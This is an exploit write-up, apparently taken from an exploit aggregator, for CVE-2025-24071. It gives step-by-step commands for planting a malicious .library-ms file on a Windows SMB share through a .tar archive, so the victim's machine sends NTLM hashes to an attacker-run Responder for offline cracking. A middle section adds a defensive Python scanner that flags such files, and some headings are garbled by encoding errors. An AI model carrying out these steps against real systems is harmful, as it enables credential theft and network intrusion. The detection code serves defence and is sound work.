## https://sploitus.com/exploit?id=B7436966-38EB-53C7-9295-00D0322061AC
# CVE-2025-24071 PoC (SMB + TAR Extraction Method)

This is a PoC for exploiting **CVE-2025-24071**, a vulnerability in Windows that allows NTLM hash leakage via `.library-ms` files. This version diverges slightly from others by using a `.tar` archive instead of a `.zip`, which improves compatibility in SMB-only environments.

## 📌 Why `.tar` instead of `.zip`?

Most public PoCs use `.zip` to package the malicious `.library-ms` file. However, in a restricted SMB environment (e.g., where the only access is via `smbclient`), ZIP files can't be extracted remotely. A `.tar` archive can be extracted directly on the SMB share with the `tar` command built into `smbclient`, allowing remote deployment **without needing user interaction**.

---

## 🔧 Requirements

- Attacker machine with:
  - `Responder` installed and running
  - An SMB server (e.g., `Responder`, `impacket-smbserver`, or `samba`)
- Victim machine:
  - Windows with SMB access enabled to the attacker's IP

---

## 🧪 Steps

### 1. Start Responder

Start Responder on the correct interface:

```bash
sudo responder -I <interface>
```

Make sure the IP in the payload matches this interface.

### 2. Generate the malicious .library-ms and pack into .tar

```bash
python3 create_tar_poc.py
```

You'll be prompted to enter:

- A file name (e.g., exploit)
- The attacker's IP (e.g., 192.168.1.100)

This generates:

- exploit.library-ms (inside exploit.tar)
- exploit.tar

### 3. Upload and extract on the victim's SMB share

From your attacker machine, connect to the victim's SMB share using `smbclient`:

```bash
smbclient //<victim_ip>/<sharename> -U <USERNAME>
put exploit.tar
tar x exploit.tar
```

This will unpack the `.library-ms` into the share.

When `exploit.tar` is extracted, the `.library-ms` file, whose XML points at our SMB server (the Responder instance running on our machine), makes Windows connect to it and start an NTLM authentication attempt. That request carries the username, domain and an NTLM hash derived from the user's password, which can later be cracked offline.
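On the defensive side, the mechanism above gives a simple detection handle: a `.library-ms` file landing on a share whose XML references a UNC path on a host that is not one of your own file servers. The following scanner is an added example, not part of this PoC or its author's code; it opens a tar archive in memory, inspects every `.library-ms` member and reports UNC hosts outside an allowlist. The sample archive and its minimal XML are constructed for the demo (the real Library Description schema has more elements; the scanner walks every text node, so it does not depend on element names), and `192.0.2.10` is a documentation address.

```python
import io
import re
import tarfile
import xml.etree.ElementTree as ET

# Constructed sample: a minimal library-style XML whose location element points
# at a UNC path on a non-local host. Not the real schema, just the shape that matters.
SAMPLE_LIBRARY_MS = b"""<library>
  <location>\\\\192.0.2.10\\share</location>
</library>
"""

# Matches a \\host\share path and captures the host part.
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")


def find_unc_hosts(xml_bytes):
    """Return every host referenced by a UNC-style text node in the XML."""
    hosts = []
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError:
        return hosts  # not XML: nothing to report from this member
    for elem in root.iter():
        m = UNC_RE.match((elem.text or "").strip())
        if m:
            hosts.append(m.group(1))
    return hosts


def scan_tar_for_library_ms(tar_bytes, trusted_hosts):
    """Report (member_name, host) for each .library-ms member in the archive
    that references a UNC host outside the allowlist (case-insensitive)."""
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tar:
        for member in tar.getmembers():
            if not member.isfile() or not member.name.lower().endswith(".library-ms"):
                continue
            data = tar.extractfile(member).read()
            findings.extend((member.name, h) for h in find_unc_hosts(data) if h.lower() not in trusted)
    return findings


def build_sample_tar():
    """Constructed input: pack the sample XML as exploit.library-ms inside a tar."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo(name="exploit.library-ms")
        info.size = len(SAMPLE_LIBRARY_MS)
        tar.addfile(info, io.BytesIO(SAMPLE_LIBRARY_MS))
    return buf.getvalue()
```

Running `scan_tar_for_library_ms(build_sample_tar(), {"fileserver01"})` returns `[("exploit.library-ms", "192.0.2.10")]`; the same check can be pointed at archives uploaded to a share, or at `.library-ms` files already on disk, before they are opened by Explorer.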

## ๐Ÿ“ฝ๏ธ PoC Video

Coming soon...

## ๐Ÿ™ Credits
Daniel Miranda Barcelona AKA Excal1bur | Based on the original work by 0x6rss, adapted for TAR-based SMB deployments in lab scenarios.